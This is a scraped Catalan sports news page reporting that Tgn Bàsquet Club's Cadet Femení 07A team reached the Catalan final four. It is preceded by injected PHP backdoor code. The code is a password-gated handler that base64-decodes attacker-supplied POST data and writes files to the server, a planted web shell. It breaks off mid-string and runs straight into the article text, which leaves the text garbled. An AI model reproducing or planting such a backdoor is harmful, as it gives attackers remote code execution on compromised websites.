function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet Femení 07A entre els 4 millors equips de Catalunya - Tgn Bàsquet Club -

El Cadet Femení 07A entre els 4 millors equips de Catalunya

Updated: maig 31, 2022

El passat 28 de maig el Cadet Femení 07A es jugava contra el Grup Barna el primer lloc del grup i la classificació per a la final a 4 de l’11/12 de juny. El TGN havia de guanyar per 6 punts o més per aconseguir-ho, contra un equip que no perdia des de principis del mes de desembre. El partit va començar molt bé pel TGN que va aconseguir arribar amb un avantatge de 10 punts al finalitzar el primer quart. A partir d’allí, les diferències van estar sempre entre els 5 i els 10 punts fins que a mitjans del tercer quart el Grup Barna va empatar el partit a 26. Tot i així, el TGN va continuar lluitant i es va posar per davant altra vegada en el marcador. A l’inici de l’últim quart, tot seguia per decidir, ja que el resultat al minut 33 era de 45-41. Però a partir d’aquell moment el TGN gràcies a una molt bona defensa i un seguit de bones accions en atac va aconseguir un parcial de 17-5 per tancar el partit. A la final a 4, juntament amb el TGN Bàsquet, està confirmada la presència del Barça CBS i del Joventut de Badalona i falta saber qui serà el quart classificat si l’U.E. Mataró o el Basket Almeda.